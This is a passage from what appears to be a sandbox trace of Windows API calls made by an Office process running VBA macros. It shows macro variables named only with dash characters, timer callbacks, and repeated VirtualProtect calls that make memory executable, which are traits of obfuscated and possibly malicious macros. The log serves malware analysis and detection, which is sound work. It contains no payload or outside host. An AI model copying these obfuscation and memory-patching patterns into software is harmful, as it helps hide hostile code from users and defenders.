returned 0x8001 [0119.851] GetProcAddress (hModule=0x743d0000, lpProcName="SetTimer") returned 0x743eee50 [0119.851] SetTimer (hWnd=0x0, nIDEvent=0x11892020, uElapse=0x1, lpTimerFunc=0x11892020) returned 0x7f80 [0119.851] GetLastError () returned 0x0 [0119.851] CRetailMalloc_Alloc () returned 0xcb94990 [0119.852] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.852] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.852] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x97\x96", cchCount2=-1) returned 1 [0119.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f1e, cbMultiByte=25, lpWideCharStr=0x1976c4, cchWideChar=26 | out: lpWideCharStr="–—–––——–—–——––——–––——–—–") returned 25 [0119.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2b5e, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="–—–––——–—–——––——–––——–—–") returned 25 [0119.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2b5e, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="–—–––——–—–——––——–––——–—–") returned 25 [0119.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2b5e, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="–—–––——–—–——––——–––——–—–") returned 25 [0119.853] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x97\x96", cchCount2=-1) returned 1 [0119.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2b5e, cbMultiByte=25, lpWideCharStr=0x197724, cchWideChar=26 | out: lpWideCharStr="–—–––——–—–——––——–––——–—–") returned 25 [0119.853] CRetailMalloc_Alloc () returned 0xcb6ed88 [0119.853] _mbscpy_s (in: _Dst=0xcb6ed88, _DstSizeInBytes=0x19, _Src=0x111e2b5e | out: _Dst=0xcb6ed88) returned 0x0 [0119.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c9a, cbMultiByte=32, lpWideCharStr=0x197734, cchWideChar=33 | out: lpWideCharStr="_B_var_–—–––——–—–——––——–––——–—–") returned 32 [0119.854] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x19, _Src=0x111e2b5e | out: _Dst=0x19779c) returned 0x0 [0119.854] CRetailMalloc_Free () returned 0x1 [0119.854] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0119.854] memcpy (in: _Dst=0xd01516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0119.854] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.854] memcpy (in: _Dst=0xd015270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0119.854] memcpy (in: _Dst=0xd015168, _Src=0x197714, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.854] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300922, cbMultiByte=9, lpWideCharStr=0x1976c4, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0119.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e0922, cbMultiByte=9, lpWideCharStr=0x197724, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0119.855] memcpy (in: _Dst=0xd015168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.855] memcpy (in: _Dst=0xd01516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0119.855] memcpy (in: _Dst=0xd015168, _Src=0x197888, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0119.856] memcpy (in: _Dst=0xcb949f8, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb949f8) returned 0xcb949f8 [0119.856] CRetailMalloc_Realloc () returned 0xcb94990 [0119.856] CRetailMalloc_Free () returned 0x1 [0119.856] GetCurrentProcess () returned 0xffffffff [0119.856] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0119.856] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.857] GetCurrentProcess () returned 0xffffffff [0119.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0119.857] GetCurrentProcess () returned 0xffffffff [0119.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0119.857] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.858] GetCurrentProcess () returned 0xffffffff [0119.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0119.858] GetCurrentProcess () returned 0xffffffff [0119.858] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0119.858] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.859] GetCurrentProcess () returned 0xffffffff [0119.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0119.859] GetCurrentProcess () returned 0xffffffff [0119.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0119.859] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.898] GetCurrentProcess () returned 0xffffffff [0119.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0119.899] GetCurrentProcess () returned 0xffffffff [0119.899] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0119.899] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.900] GetCurrentProcess () returned 0xffffffff [0119.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0119.900] GetCurrentProcess () returned 0xffffffff [0119.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0119.900] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.900] GetCurrentProcess () returned 0xffffffff [0119.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0119.900] GetCurrentProcess () returned 0xffffffff [0119.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0119.900] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.901] GetCurrentProcess () returned 0xffffffff [0119.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0119.901] GetCurrentProcess () returned 0xffffffff [0119.901] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0119.901] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.902] GetCurrentProcess () returned 0xffffffff [0119.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0119.902] GetCurrentProcess () returned 0xffffffff [0119.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0119.902] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.902] GetCurrentProcess () returned 0xffffffff [0119.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0119.902] GetCurrentProcess () returned 0xffffffff [0119.902] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0119.902] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.903] GetCurrentProcess () returned 0xffffffff [0119.903] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0119.903] GetCurrentProcess () returned 0xffffffff [0119.903] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0119.903] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.904] GetCurrentProcess () returned 0xffffffff [0119.904] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0119.904] GetCurrentProcess () returned 0xffffffff [0119.904] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0119.904] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.904] GetCurrentProcess () returned 0xffffffff [0119.904] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0119.904] GetCurrentProcess () returned 0xffffffff [0119.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0119.905] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.905] GetCurrentProcess () returned 0xffffffff [0119.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0119.905] GetCurrentProcess () returned 0xffffffff [0119.905] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0119.905] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.906] GetCurrentProcess () returned 0xffffffff [0119.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0119.906] GetCurrentProcess () returned 0xffffffff [0119.906] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0119.906] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.907] GetCurrentProcess () returned 0xffffffff [0119.907] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0119.907] GetCurrentProcess () returned 0xffffffff [0119.907] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0119.907] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.908] GetCurrentProcess () returned 0xffffffff [0119.908] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0119.908] GetCurrentProcess () returned 0xffffffff [0119.908] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0119.908] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.908] GetCurrentProcess () returned 0xffffffff [0119.908] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0119.908] GetCurrentProcess () returned 0xffffffff [0119.909] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0119.909] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.909] GetCurrentProcess () returned 0xffffffff [0119.909] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0119.909] GetCurrentProcess () returned 0xffffffff [0119.909] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0119.909] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.910] GetCurrentProcess () returned 0xffffffff [0119.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0119.910] GetCurrentProcess () returned 0xffffffff [0119.910] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0119.910] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.910] GetCurrentProcess () returned 0xffffffff [0119.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0119.911] GetCurrentProcess () returned 0xffffffff [0119.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0119.911] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.911] GetCurrentProcess () returned 0xffffffff [0119.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0119.911] GetCurrentProcess () returned 0xffffffff [0119.911] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0119.911] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.912] GetCurrentProcess () returned 0xffffffff [0119.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0119.912] GetCurrentProcess () returned 0xffffffff [0119.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0119.912] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.913] GetCurrentProcess () returned 0xffffffff [0119.913] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0119.913] GetCurrentProcess () returned 0xffffffff [0119.913] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0119.913] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.914] GetCurrentProcess () returned 0xffffffff [0119.914] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0119.914] GetCurrentProcess () returned 0xffffffff [0119.914] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0119.914] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.914] GetCurrentProcess () returned 0xffffffff [0119.914] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0119.914] GetCurrentProcess () returned 0xffffffff [0119.915] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0119.915] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.915] GetCurrentProcess () returned 0xffffffff [0119.915] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0119.915] GetCurrentProcess () returned 0xffffffff [0119.915] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0119.915] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.916] GetCurrentProcess () returned 0xffffffff [0119.916] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0119.916] GetCurrentProcess () returned 0xffffffff [0119.916] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0119.916] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.917] GetCurrentProcess () returned 0xffffffff [0119.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0119.917] GetCurrentProcess () returned 0xffffffff [0119.917] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0119.917] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.918] GetCurrentProcess () returned 0xffffffff [0119.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0119.918] GetCurrentProcess () returned 0xffffffff [0119.918] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0119.918] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.919] GetCurrentProcess () returned 0xffffffff [0119.919] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0119.919] GetCurrentProcess () returned 0xffffffff [0119.919] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0119.919] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0119.919] GetCurrentProcess () returned 0xffffffff [0119.919] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0119.919] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.919] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0119.920] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0119.920] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.920] GetProcAddress (hModule=0x693e0000, lpProcName=0x256) returned 0x693e74be [0119.922] GetAsyncKeyState (vKey=3) returned 0 [0119.922] CRetailMalloc_Alloc () returned 0xcb94a40 [0119.923] memcpy (in: _Dst=0xd015168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.923] memcpy (in: _Dst=0xd015270, _Src=0x1977e4, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f56, cbMultiByte=6, lpWideCharStr=0x1975e4, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0822, cbMultiByte=6, lpWideCharStr=0x197644, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0119.924] memcpy (in: _Dst=0xd015168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f7a, cbMultiByte=32, lpWideCharStr=0x1975e4, cchWideChar=33 | out: lpWideCharStr="––—–––————––——–—–—–——–———––––––") returned 32 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07e6, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="––—–––————––——–—–—–——–———––––––") returned 32 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07e6, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="––—–––————––——–—–—–——–———––––––") returned 32 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07e6, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="––—–––————––——–—–—–——–———––––––") returned 32 [0119.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c07e6, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="––—–––————––——–—–—–——–———––––––") returned 32 [0119.925] CRetailMalloc_Alloc () returned 0xc877908 [0119.925] _mbscpy_s (in: _Dst=0xc877908, _DstSizeInBytes=0x20, _Src=0x112c07e6 | out: _Dst=0xc877908) returned 0x0 [0119.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0cd6, cbMultiByte=39, lpWideCharStr=0x197654, cchWideChar=40 | out: lpWideCharStr="_B_var_––—–––————––——–—–—–——–———––––––") returned 39 [0119.926] _mbscpy_s (in: _Dst=0x1976bc, _DstSizeInBytes=0x20, _Src=0x112c07e6 | out: _Dst=0x1976bc) returned 0x0 [0119.926] CRetailMalloc_Free () returned 0x1 [0119.926] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x197634, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x197634, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x197634, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] memcpy (in: _Dst=0xd015168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0119.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0119.927] memcpy (in: _Dst=0xcb94ab4, _Src=0x197864, _Size=0x18 | out: _Dst=0xcb94ab4) returned 0xcb94ab4 [0119.927] CRetailMalloc_Realloc () returned 0xcb94a40 [0119.927] CRetailMalloc_Free () returned 0x1 [0119.927] GetCurrentProcess () returned 0xffffffff [0119.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0119.927] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0119.928] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0119.928] GetCurrentProcess () returned 0xffffffff [0119.928] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0119.929] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.929] GetCurrentProcess () returned 0xffffffff [0119.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0119.929] GetCurrentProcess () returned 0xffffffff [0119.929] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0119.929] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.930] GetCurrentProcess () returned 0xffffffff [0119.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0119.930] GetCurrentProcess () returned 0xffffffff [0119.930] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0119.930] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0119.931] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0119.931] GetCurrentProcess () returned 0xffffffff [0119.931] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0119.931] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.932] 